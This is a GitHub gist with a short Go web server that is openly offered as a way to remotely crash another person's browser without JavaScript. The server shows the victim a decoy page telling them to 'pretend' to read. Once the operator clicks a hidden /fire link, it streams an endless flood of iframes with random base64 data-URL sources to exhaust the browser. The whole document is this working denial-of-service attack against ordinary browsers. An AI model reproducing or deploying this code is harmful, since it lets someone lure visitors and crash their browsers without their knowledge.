Skip to content

Instantly share code, notes, and snippets.

@wybiral
Last active May 6, 2019 21:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save wybiral/61d9278870e2e97da36f25abb7e562b0 to your computer and use it in GitHub Desktop.
Save wybiral/61d9278870e2e97da36f25abb7e562b0 to your computer and use it in GitHub Desktop.
Remotely trigger another browser to crash (without JavaScript)
// Send infinite data-URL iframes (with /aim and /fire to remotely trigger)
package main
import (
"encoding/base64"
"math/rand"
"net/http"
"sync"
)
var wg sync.WaitGroup
func main() {
wg.Add(1)
http.HandleFunc("/aim", aim)
http.HandleFunc("/fire", fire)
http.HandleFunc("/", flood)
http.ListenAndServe(":8080", nil)
}
func aim(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/html; charset=utf-8")
w.Write([]byte("<a href=\"/fire\">FIRE!</a>"))
}
func fire(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/html; charset=utf-8")
wg.Done()
w.Write([]byte("Done."))
}
func flood(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/html; charset=utf-8")
flusher, ok := w.(http.Flusher)
if !ok {
return
}
w.Write([]byte("<h1>OH HAI MARK</h1><p>Pretend like you're reading something...</p>\n"))
flusher.Flush()
data := make([]byte, 16)
head := []byte("<iframe src=\"data:application/octet-stream;base64,")
foot := []byte("\"></iframe>")
wg.Wait()
for {
for i := 0; i < 100; i++ {
_, err := w.Write(head)
if err != nil {
return
}
rand.Read(data)
encoder := base64.NewEncoder(base64.StdEncoding, w)
_, err = encoder.Write(data)
if err != nil {
return
}
encoder.Close()
_, err = w.Write(foot)
if err != nil {
return
}
}
flusher.Flush()
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment